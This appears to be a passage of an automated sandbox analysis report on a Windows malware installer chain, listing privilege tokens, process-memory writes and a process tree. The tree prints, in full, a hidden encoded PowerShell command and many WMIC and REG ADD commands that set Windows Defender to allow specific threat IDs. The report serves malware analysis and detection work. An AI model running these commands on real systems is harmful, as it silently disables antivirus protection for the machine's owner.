Sun191101c1aaa.exeSun19262b9e49ad.exeSun19e4ade31b2a.exeSun195a1614ec24e6a.exepowershell.exeSun198361825f4.exe2.exePublicDwlBrowser1100.exe5.exeWerFault.exeDyzW75Vg9OFYpumqyTL2gvjP.exeLivelyScreenRecF18.exeBearVpn 3.exetaskkill.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exesvchost.exepowershell.exedescription pid process Token: SeDebugPrivilege 3124 Sun191101c1aaa.exe Token: SeCreateTokenPrivilege 1640 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1640 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1640 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1640 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1640 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1640 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1640 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1640 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1640 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1640 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1640 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1640 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1640 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1640 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1640 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1640 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1640 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1640 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1640 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1640 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1640 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1640 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1640 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1640 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1640 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1640 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1640 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1640 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1640 Sun19262b9e49ad.exe Token: 31 1640 Sun19262b9e49ad.exe Token: 32 1640 Sun19262b9e49ad.exe Token: 33 1640 Sun19262b9e49ad.exe Token: 34 1640 Sun19262b9e49ad.exe Token: 35 1640 Sun19262b9e49ad.exe Token: SeDebugPrivilege 2392 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 1244 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2864 Sun198361825f4.exe Token: SeDebugPrivilege 4916 2.exe Token: SeDebugPrivilege 4864 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 3744 5.exe Token: SeDebugPrivilege 4584 WerFault.exe Token: SeRestorePrivilege 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe Token: SeBackupPrivilege 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe Token: SeBackupPrivilege 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe Token: SeDebugPrivilege 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe Token: SeDebugPrivilege 1236 LivelyScreenRecF18.exe Token: SeDebugPrivilege 5004 BearVpn 3.exe Token: SeDebugPrivilege 3288 taskkill.exe Token: SeDebugPrivilege 3280 WerFault.exe Token: SeDebugPrivilege 4784 WerFault.exe Token: SeDebugPrivilege 1016 WerFault.exe Token: SeDebugPrivilege 4212 rundll32.exe Token: SeDebugPrivilege 1588 WerFault.exe Token: SeDebugPrivilege 3916 svchost.exe Token: SeDebugPrivilege 4212 rundll32.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeDebugPrivilege 4212 rundll32.exe Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
ultramediaburner.tmpinstaller.exechrome.exechrome.exepid process 5964 ultramediaburner.tmp 5792 installer.exe 1584 1584 1584 1584 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exechrome.exepid process 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 7268 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe 5628 chrome.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
WMIC.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 1584 6096 WMIC.exe 6936 MicrosoftEdgeCP.exe 6936 MicrosoftEdgeCP.exe 4128 MicrosoftEdge.exe 5720 MicrosoftEdgeCP.exe 5720 MicrosoftEdgeCP.exe 7496 MicrosoftEdge.exe 7188 MicrosoftEdgeCP.exe 7188 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3496 wrote to memory of 372 3496 setup_x86_x64_install.exe setup_installer.exe PID 3496 wrote to memory of 372 3496 setup_x86_x64_install.exe setup_installer.exe PID 3496 wrote to memory of 372 3496 setup_x86_x64_install.exe setup_installer.exe PID 372 wrote to memory of 4076 372 setup_installer.exe setup_install.exe PID 372 wrote to memory of 4076 372 setup_installer.exe setup_install.exe PID 372 wrote to memory of 4076 372 setup_installer.exe setup_install.exe PID 4076 wrote to memory of 380 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 380 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 380 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1160 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1160 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1160 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1452 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1452 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1452 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1500 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1500 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1500 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3684 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3684 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3684 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 512 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 512 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 512 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3984 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3984 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3984 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3724 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3724 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 3724 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1400 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1400 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1400 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2520 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2520 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2520 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2812 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2812 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2812 4076 setup_install.exe cmd.exe PID 380 wrote to memory of 1528 380 cmd.exe powershell.exe PID 380 wrote to memory of 1528 380 cmd.exe powershell.exe PID 380 wrote to memory of 1528 380 cmd.exe powershell.exe PID 3684 wrote to memory of 2392 3684 cmd.exe Sun19e4ade31b2a.exe PID 3684 wrote to memory of 2392 3684 cmd.exe Sun19e4ade31b2a.exe PID 4076 wrote to memory of 2100 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2100 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 2100 4076 setup_install.exe cmd.exe PID 1452 wrote to memory of 1640 1452 cmd.exe Sun19262b9e49ad.exe PID 1452 wrote to memory of 1640 1452 cmd.exe Sun19262b9e49ad.exe PID 1452 wrote to memory of 1640 1452 cmd.exe Sun19262b9e49ad.exe PID 1500 wrote to memory of 3780 1500 cmd.exe Sun193fda712d9f1.exe PID 1500 wrote to memory of 3780 1500 cmd.exe Sun193fda712d9f1.exe PID 4076 wrote to memory of 1784 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1784 4076 setup_install.exe cmd.exe PID 4076 wrote to memory of 1784 4076 setup_install.exe cmd.exe PID 1160 wrote to memory of 3920 1160 cmd.exe Sun1917b8fb5f09db8.exe PID 1160 wrote to memory of 3920 1160 cmd.exe Sun1917b8fb5f09db8.exe PID 1160 wrote to memory of 3920 1160 cmd.exe Sun1917b8fb5f09db8.exe PID 3724 wrote to memory of 3124 3724 cmd.exe Sun191101c1aaa.exe PID 3724 wrote to memory of 3124 3724 cmd.exe Sun191101c1aaa.exe PID 512 wrote to memory of 3496 512 cmd.exe Sun1908b94df837b3158.exe PID 512 wrote to memory of 3496 512 cmd.exe Sun1908b94df837b3158.exe PID 512 wrote to memory of 3496 512 cmd.exe Sun1908b94df837b3158.exe PID 1400 wrote to memory of 3788 1400 cmd.exe Sun19eb40faaaa9.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\kxXwdCM.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\kxXwdCM.exe tt /site_id 739435 /S2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
-
